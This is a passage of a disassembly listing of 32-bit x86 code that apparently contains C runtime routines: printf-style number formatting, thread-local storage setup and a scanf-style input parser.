loc_418F74: ; CODE XREF: sub_4189AC+5C4�j
cmp [ebp+var_C], 0
jge short loc_418F83
mov [ebp+var_C], 1
jmp short loc_418F94
; ---------------------------------------------------------------------------
loc_418F83: ; CODE XREF: sub_4189AC+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_418F94
mov [ebp+var_C], eax
loc_418F94: ; CODE XREF: sub_4189AC+5D5�j
; sub_4189AC+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_418F9E
and [ebp+var_20], 0
loc_418F9E: ; CODE XREF: sub_4189AC+5EC�j
lea esi, [ebp+var_55]
loc_418FA1: ; CODE XREF: sub_4189AC+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_418FB1
mov eax, ebx
or eax, edi
jz short loc_418FD5
loc_418FB1: ; CODE XREF: sub_4189AC+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_417280
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_418FD0
add ecx, [ebp+var_30]
loc_418FD0: ; CODE XREF: sub_4189AC+61F�j
mov [esi], cl
dec esi
jmp short loc_418FA1
; ---------------------------------------------------------------------------
loc_418FD5: ; CODE XREF: sub_4189AC+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_418FFF
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_418FF2
test eax, eax
jnz short loc_418FFF
loc_418FF2: ; CODE XREF: sub_4189AC+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_418FFC: ; CODE XREF: sub_4189AC+3B8�j
; sub_4189AC+3C1�j ...
mov [ebp+var_14], eax
loc_418FFF: ; CODE XREF: sub_4189AC+270�j
; sub_4189AC+339�j ...
cmp [ebp+var_34], 0
jnz loc_4190EE
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_419037
test bh, 1
jz short loc_41901C
mov [ebp+var_1C], 2Dh
jmp short loc_419030
; ---------------------------------------------------------------------------
loc_41901C: ; CODE XREF: sub_4189AC+668�j
test bl, 1
jz short loc_419027
mov [ebp+var_1C], 2Bh
jmp short loc_419030
; ---------------------------------------------------------------------------
loc_419027: ; CODE XREF: sub_4189AC+673�j
test bl, 2
jz short loc_419037
mov [ebp+var_1C], 20h
loc_419030: ; CODE XREF: sub_4189AC+66E�j
; sub_4189AC+679�j
mov [ebp+var_20], 1
loc_419037: ; CODE XREF: sub_4189AC+663�j
; sub_4189AC+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_419056
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_418951
add esp, 0Ch
loc_419056: ; CODE XREF: sub_4189AC+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_418975
test bl, 8
pop ecx
jz short loc_419081
test bl, 4
jnz short loc_419081
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_418951
add esp, 0Ch
loc_419081: ; CODE XREF: sub_4189AC+6BF�j
; sub_4189AC+6C4�j
cmp [ebp+var_28], 0
jz short loc_4190C8
cmp [ebp+var_14], 0
jle short loc_4190C8
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_419096: ; CODE XREF: sub_4189AC+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_41E587
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_4190D7
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_418975
cmp [ebp+var_40], 0
pop ecx
jnz short loc_419096
jmp short loc_4190D7
; ---------------------------------------------------------------------------
loc_4190C8: ; CODE XREF: sub_4189AC+6D9�j
; sub_4189AC+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_418975
pop ecx
loc_4190D7: ; CODE XREF: sub_4189AC+702�j
; sub_4189AC+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_4190EE
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_418951
add esp, 0Ch
loc_4190EE: ; CODE XREF: sub_4189AC+576�j
; sub_4189AC+657�j ...
cmp [ebp+var_2C], 0
jz short loc_419101 ; default
push [ebp+var_2C]
call sub_416C97
and [ebp+var_2C], 0
pop ecx
loc_419101: ; CODE XREF: sub_4189AC+74�j
; sub_4189AC+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_4189E1
loc_41910E: ; CODE XREF: sub_4189AC+40�j
pop edi
pop esi
loc_419110: ; CODE XREF: sub_4189AC+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_41C526
leave
retn
sub_4189AC endp
; ---------------------------------------------------------------------------
off_419121 dd offset loc_418BAB ; DATA XREF: sub_4189AC+7A�r
dd offset loc_418A2D ; jump table for switch statement
dd offset loc_418A4A
dd offset loc_418A96
dd offset loc_418AD1
dd offset loc_418ADA
dd offset loc_418B12
dd offset loc_418BE4
; =============== S U B R O U T I N E =======================================
sub_419141 proc near ; CODE XREF: sub_4191D0:loc_4191E9�p
; sub_4191D0:loc_419236�p
call sub_41A07D
mov eax, dword_432370
cmp eax, 0FFFFFFFFh
jz short locret_41915E
push eax
call dword_422170 ; TlsFree
or dword_432370, 0FFFFFFFFh
locret_41915E: ; CODE XREF: sub_419141+D�j
retn
sub_419141 endp
; =============== S U B R O U T I N E =======================================
sub_41915F proc near ; CODE XREF: sub_41698D�p sub_41699A�p ...
push ebx
push esi
call dword_422004 ; RtlGetLastWin32Error
push dword_432370
mov ebx, eax
call dword_422180 ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_4191C4
push 88h
push 1
call sub_41E5AE
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_4191BC
push esi
push dword_432370
call dword_42217C ; TlsSetValue
test eax, eax
jz short loc_4191BC
mov dword ptr [esi+54h], offset dword_432BE8
mov dword ptr [esi+14h], 1
call dword_422178 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_4191C4
; ---------------------------------------------------------------------------
loc_4191BC: ; CODE XREF: sub_41915F+2E�j
; sub_41915F+3F�j
push 10h
call sub_4185EA
pop ecx
loc_4191C4: ; CODE XREF: sub_41915F+1A�j
; sub_41915F+5B�j
push ebx
call dword_422174 ; RtlSetLastWin32Error
mov eax, esi
pop esi
pop ebx
retn
sub_41915F endp
; =============== S U B R O U T I N E =======================================
sub_4191D0 proc near ; CODE XREF: .text:loc_41870E�p
call sub_41A034
test eax, eax
jz short loc_4191E9
call dword_422184 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_432370, eax
jnz short loc_4191F1
loc_4191E9: ; CODE XREF: sub_4191D0+7�j
call sub_419141
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4191F1: ; CODE XREF: sub_4191D0+17�j
push esi
push 88h
push 1
call sub_41E5AE
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_419236
push esi
push dword_432370
call dword_42217C ; TlsSetValue
test eax, eax
jz short loc_419236
mov dword ptr [esi+54h], offset dword_432BE8
mov dword ptr [esi+14h], 1
call dword_422178 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_419236: ; CODE XREF: sub_4191D0+34�j
; sub_4191D0+45�j
call sub_419141
xor eax, eax
pop esi
retn
sub_4191D0 endp
; =============== S U B R O U T I N E =======================================
sub_41923F proc near ; CODE XREF: sub_419255+52�p
; sub_419255+1EF�p ...
dec dword ptr [edx+4]
js short loc_41924D
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41924D: ; CODE XREF: sub_41923F+3�j
push edx
call sub_41B136
pop ecx
retn
sub_41923F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419255 proc near ; CODE XREF: sub_416AE4+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_42BF18
call __SEH_prolog
mov eax, dword_432A48
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_419283: ; CODE XREF: sub_419255+88�j
; sub_419255+A55�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_419CC2
movzx eax, al
push eax
call sub_41E6E2
pop ecx
test eax, eax
jz short loc_4192DF
dec [ebp+var_30]
loc_4192A1: ; CODE XREF: sub_419255+62�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_41923F
mov esi, eax
push esi
call sub_41E6E2
pop ecx
test eax, eax
jnz short loc_4192A1
cmp esi, 0FFFFFFFFh
jz short loc_4192C9
push [ebp+arg_0]
push esi
call sub_41E71C
pop ecx
pop ecx
loc_4192C9: ; CODE XREF: sub_419255+67�j
; sub_419255+86�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41E6E2
pop ecx
test eax, eax
jnz short loc_4192C9
jmp short loc_419283
; ---------------------------------------------------------------------------
loc_4192DF: ; CODE XREF: sub_419255+47�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_419C3E
xor edi, edi
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_41931C: ; CODE XREF: sub_419255+186�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41E669
pop ecx
test eax, eax
jz short loc_41933D
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_4193D7
; ---------------------------------------------------------------------------
loc_41933D: ; CODE XREF: sub_419255+D7�j
cmp ebx, 4Eh
jg short loc_4193B5
jz loc_4193D7
cmp ebx, 2Ah
jz short loc_4193B0
cmp ebx, 46h
jz loc_4193D7
cmp ebx, 49h
jz short loc_419365
cmp ebx, 4Ch
jnz short loc_4193C4
inc [ebp+var_4F]
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_419365: ; CODE XREF: sub_419255+104�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_419384
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_419384
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_419384: ; CODE XREF: sub_419255+116�j
; sub_419255+11E�j
cmp cl, 33h
jnz short loc_419395
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_419395
mov esi, eax
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_419395: ; CODE XREF: sub_419255+132�j
; sub_419255+13A�j
cmp cl, 64h
jz short loc_4193D7
cmp cl, 69h
jz short loc_4193D7
cmp cl, 6Fh
jz short loc_4193D7
cmp cl, 78h
jz short loc_4193D7
cmp cl, 58h
jnz short loc_4193C4
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_4193B0: ; CODE XREF: sub_419255+F6�j
inc [ebp+var_4B]
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_4193B5: ; CODE XREF: sub_419255+EB�j
cmp ebx, 68h
jz short loc_4193D1
cmp ebx, 6Ch
jz short loc_4193C9
cmp ebx, 77h
jz short loc_4193CC
loc_4193C4: ; CODE XREF: sub_419255+109�j
; sub_419255+157�j
inc [ebp+var_4C]
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_4193C9: ; CODE XREF: sub_419255+168�j
inc [ebp+var_4F]
loc_4193CC: ; CODE XREF: sub_419255+16D�j
inc [ebp+var_4E]
jmp short loc_4193D7
; ---------------------------------------------------------------------------
loc_4193D1: ; CODE XREF: sub_419255+163�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_4193D7: ; CODE XREF: sub_419255+E3�j
; sub_419255+ED�j ...
cmp [ebp+var_4C], 0
jz loc_41931C
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_419401
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_419404
; ---------------------------------------------------------------------------
loc_419401: ; CODE XREF: sub_419255+196�j
mov ebx, [ebp+var_64]
loc_419404: ; CODE XREF: sub_419255+1AA�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_419422
mov al, [esi]
cmp al, 53h
jz short loc_41941E
cmp al, 43h
jz short loc_41941E
or [ebp+var_4E], 0FFh
jmp short loc_419422
; ---------------------------------------------------------------------------
loc_41941E: ; CODE XREF: sub_419255+1BD�j
; sub_419255+1C1�j
mov [ebp+var_4E], 1
loc_419422: ; CODE XREF: sub_419255+1B7�j
; sub_419255+1C7�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_419459
cmp edi, 63h
jz loc_4194B9
cmp edi, 7Bh
jz short loc_4194B9
loc_41943E: ; CODE XREF: sub_419255+1FF�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_41923F
mov esi, eax
push esi
call sub_41E6E2
pop ecx
test eax, eax
jnz short loc_41943E
mov [ebp+var_28], esi
loc_419459: ; CODE XREF: sub_419255+1D9�j
mov esi, [ebp+arg_0]
loc_41945C: ; CODE XREF: sub_419255+274�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_41946D
cmp [ebp+var_48], 0
jz loc_4196C2
loc_41946D: ; CODE XREF: sub_419255+20C�j
cmp edi, 6Fh
jg loc_419691
jz loc_419A04
cmp edi, 63h
jz loc_419670
cmp edi, 64h
jz loc_419A04
jle loc_4196B7
cmp edi, 67h
jle short loc_4194E3
cmp edi, 69h
jz short loc_4194CB
cmp edi, 6Eh
jnz loc_4196B7
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_419C16
jmp loc_419C36
; ---------------------------------------------------------------------------
loc_4194B9: ; CODE XREF: sub_419255+1DE�j
; sub_419255+1E7�j
inc [ebp+var_30]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_41923F
mov [ebp+var_28], eax
jmp short loc_41945C
; ---------------------------------------------------------------------------
loc_4194CB: ; CODE XREF: sub_419255+247�j
push 64h
pop edi
loc_4194CE: ; CODE XREF: sub_419255+457�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_4198FD
mov [ebp+var_4A], 1
jmp loc_419902
; ---------------------------------------------------------------------------
loc_4194E3: ; CODE XREF: sub_419255+242�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_4194FF
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_419504
; ---------------------------------------------------------------------------
loc_4194FF: ; CODE XREF: sub_419255+29A�j
cmp ebx, 2Bh
jnz short loc_41951B
loc_419504: ; CODE XREF: sub_419255+2A8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_41951E
; ---------------------------------------------------------------------------
loc_41951B: ; CODE XREF: sub_419255+2AD�j
mov edi, [ebp+arg_0]
loc_41951E: ; CODE XREF: sub_419255+2C4�j
cmp [ebp+var_44], 0
jz short loc_41952D
cmp [ebp+var_48], 15Dh
jle short loc_419555
loc_41952D: ; CODE XREF: sub_419255+2CD�j
mov [ebp+var_48], 15Dh
jmp short loc_419555
; ---------------------------------------------------------------------------
loc_419536: ; CODE XREF: sub_419255+309�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419560
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
loc_419555: ; CODE XREF: sub_419255+2D6�j
; sub_419255+2DF�j
push ebx
call sub_41E669
pop ecx
test eax, eax
jnz short loc_419536
loc_419560: ; CODE XREF: sub_419255+2E9�j
cmp byte_432C98, bl
jnz short loc_4195B2
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4195B2
inc [ebp+var_30]
mov edx, edi
call sub_41923F
mov ebx, eax
mov al, byte_432C98
mov [esi], al
inc esi
jmp short loc_4195A4
; ---------------------------------------------------------------------------
loc_419588: ; CODE XREF: sub_419255+35B�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4195B2
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_41923F
mov ebx, eax
loc_4195A4: ; CODE XREF: sub_419255+331�j
push ebx
mov [ebp+var_28], ebx
call sub_41E669
pop ecx
test eax, eax
jnz short loc_419588
loc_4195B2: ; CODE XREF: sub_419255+311�j
; sub_419255+31B�j ...
cmp [ebp+var_40], 0
jz short loc_419627
cmp ebx, 65h
jz short loc_4195C2
cmp ebx, 45h
jnz short loc_419627
loc_4195C2: ; CODE XREF: sub_419255+366�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419627
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_4195E9
mov [esi], al
inc esi
jmp short loc_4195EE
; ---------------------------------------------------------------------------
loc_4195E9: ; CODE XREF: sub_419255+38D�j
cmp ebx, 2Bh
jnz short loc_41961C
loc_4195EE: ; CODE XREF: sub_419255+392�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_41960D
and [ebp+var_48], eax
jmp short loc_41961C
; ---------------------------------------------------------------------------
loc_4195FD: ; CODE XREF: sub_419255+3D0�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419627
inc [ebp+var_40]
mov [esi], bl
inc esi
loc_41960D: ; CODE XREF: sub_419255+3A1�j
mov edx, edi
inc [ebp+var_30]
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
loc_41961C: ; CODE XREF: sub_419255+397�j
; sub_419255+3A6�j
push ebx
call sub_41E669
pop ecx
test eax, eax
jnz short loc_4195FD
loc_419627: ; CODE XREF: sub_419255+361�j
; sub_419255+36B�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_419638
push edi
push ebx
call sub_41E71C
pop ecx
pop ecx
loc_419638: ; CODE XREF: sub_419255+3D8�j
cmp [ebp+var_40], 0
jz loc_419CC2
cmp [ebp+var_4B], 0
jnz loc_419C36
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_432A30
add esp, 0Ch
jmp loc_419C36
; ---------------------------------------------------------------------------
loc_419670: ; CODE XREF: sub_419255+22A�j
test ecx, ecx
jnz short loc_41967E
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_41967E: ; CODE XREF: sub_419255+41D�j
; sub_419255+44A�j
cmp [ebp+var_4E], 0
jle loc_419809
mov [ebp+var_4D], 1
jmp loc_419809
; ---------------------------------------------------------------------------
loc_419691: ; CODE XREF: sub_419255+21B�j
mov eax, edi
sub eax, 70h
jz loc_419A00
sub eax, 3
jz short loc_41967E
dec eax
dec eax
jz loc_419A04
sub eax, 3
jz loc_4194CE
sub eax, 3
jz short loc_4196E3
loc_4196B7: ; CODE XREF: sub_419255+239�j
; sub_419255+24C�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_28]
jz short loc_4196CB
loc_4196C2: ; CODE XREF: sub_419255+212�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_419C92
; ---------------------------------------------------------------------------
loc_4196CB: ; CODE XREF: sub_419255+46B�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_419C36
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_419C36
; ---------------------------------------------------------------------------
loc_4196E3: ; CODE XREF: sub_419255+460�j
cmp [ebp+var_4E], 0
jle short loc_4196ED
mov [ebp+var_4D], 1
loc_4196ED: ; CODE XREF: sub_419255+492�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_41970A
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_41970A: ; CODE XREF: sub_419255+4A8�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_419762
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_416B20
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_419762
; ---------------------------------------------------------------------------
loc_41972A: ; DATA XREF: .text:stru_42BF18�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41972E: ; DATA XREF: .text:stru_42BF18�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C068
push 20h
call sub_416DAF
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_41974E
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_419CC2
; ---------------------------------------------------------------------------
loc_41974E: ; CODE XREF: sub_419255+4EE�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_419762: ; CODE XREF: sub_419255+4BA�j
; sub_419255+4D3�j
push 20h
push 0
push ebx
call sub_41E880
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_4197E9
cmp byte ptr [edi], 5Dh
jnz short loc_4197E9
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_4197EC
; ---------------------------------------------------------------------------
loc_419783: ; CODE XREF: sub_419255+59B�j
inc edi
cmp al, 2Dh
jnz short loc_4197D3
test dl, dl
jz short loc_4197D3
mov cl, [edi]
cmp cl, 5Dh
jz short loc_4197D3
inc edi
cmp dl, cl
jnb short loc_41979C
mov al, cl
jmp short loc_4197A0
; ---------------------------------------------------------------------------
loc_41979C: ; CODE XREF: sub_419255+541�j
mov al, dl
mov dl, cl
loc_4197A0: ; CODE XREF: sub_419255+545�j
cmp dl, al
ja short loc_4197CF
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_4197B4: ; CODE XREF: sub_419255+578�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_4197B4
loc_4197CF: ; CODE XREF: sub_419255+54D�j
xor dl, dl
jmp short loc_4197EC
; ---------------------------------------------------------------------------
loc_4197D3: ; CODE XREF: sub_419255+531�j
; sub_419255+535�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_4197E9: ; CODE XREF: sub_419255+51E�j
; sub_419255+523�j
mov dl, [ebp+var_39]
loc_4197EC: ; CODE XREF: sub_419255+52C�j
; sub_419255+57C�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_419783
test al, al
jz loc_419CC2
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_419806
mov [ebp+arg_4], edi
loc_419806: ; CODE XREF: sub_419255+5AC�j
mov edi, [ebp+var_68]
loc_419809: ; CODE XREF: sub_419255+42D�j
; sub_419255+437�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_419821
push [ebp+arg_0]
push [ebp+var_28]
call sub_41E71C
pop ecx
pop ecx
loc_419821: ; CODE XREF: sub_419255+5BD�j
; sub_419255+754�j ...
cmp [ebp+var_44], 0
jz short loc_419835
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_4199C7
loc_419835: ; CODE XREF: sub_419255+5D0�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_41923F
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_4199B4
cmp edi, 63h
jz short loc_419895
cmp edi, 73h
jnz short loc_419865
cmp eax, 9
jl short loc_419860
cmp eax, 0Dh
jle short loc_419865
loc_419860: ; CODE XREF: sub_419255+604�j
cmp eax, 20h
jnz short loc_419895
loc_419865: ; CODE XREF: sub_419255+5FF�j
; sub_419255+609�j
cmp edi, 7Bh
jnz loc_4199B4
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_4199B4
mov edi, [ebp+var_68]
loc_419895: ; CODE XREF: sub_419255+5FA�j
; sub_419255+60E�j
cmp [ebp+var_4B], 0
jnz loc_4199AE
cmp [ebp+var_4D], 0
jz loc_4199A3
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_432A40
test byte ptr [ecx+eax*2+1], 80h
jz short loc_4198D0
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_41923F
mov [ebp+var_1D3], al
loc_4198D0: ; CODE XREF: sub_419255+668�j
push dword_432C94
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_41E848
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_4199A6
; ---------------------------------------------------------------------------
loc_4198FD: ; CODE XREF: sub_419255+27F�j
cmp ebx, 2Bh
jnz short loc_419920
loc_419902: ; CODE XREF: sub_419255+289�j
dec [ebp+var_48]
jnz short loc_419911
test ecx, ecx
jz short loc_419911
mov [ebp+var_4C], 1
jmp short loc_419920
; ---------------------------------------------------------------------------
loc_419911: ; CODE XREF: sub_419255+6B0�j
; sub_419255+6B4�j
inc [ebp+var_30]
mov edx, esi
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
loc_419920: ; CODE XREF: sub_419255+6AB�j
; sub_419255+6BA�j
cmp ebx, 30h
jnz loc_419A35
inc [ebp+var_30]
mov edx, esi
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_41997D
cmp bl, 58h
jz short loc_41997D
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_419964
cmp [ebp+var_44], 0
jz short loc_41995C
dec [ebp+var_48]
jnz short loc_41995C
inc [ebp+var_4C]
loc_41995C: ; CODE XREF: sub_419255+6FD�j
; sub_419255+702�j
push 6Fh
loc_41995E: ; CODE XREF: sub_419255+74C�j
pop edi
jmp loc_419A35
; ---------------------------------------------------------------------------
loc_419964: ; CODE XREF: sub_419255+6F7�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_419975
push esi
push ebx
call sub_41E71C
pop ecx
pop ecx
loc_419975: ; CODE XREF: sub_419255+715�j
push 30h
pop ebx
jmp loc_419A32
; ---------------------------------------------------------------------------
loc_41997D: ; CODE XREF: sub_419255+6E6�j
; sub_419255+6EB�j
inc [ebp+var_30]
mov edx, esi
call sub_41923F
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_41999F
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_41999F
inc [ebp+var_4C]
loc_41999F: ; CODE XREF: sub_419255+73B�j
; sub_419255+745�j
push 78h
jmp short loc_41995E
; ---------------------------------------------------------------------------
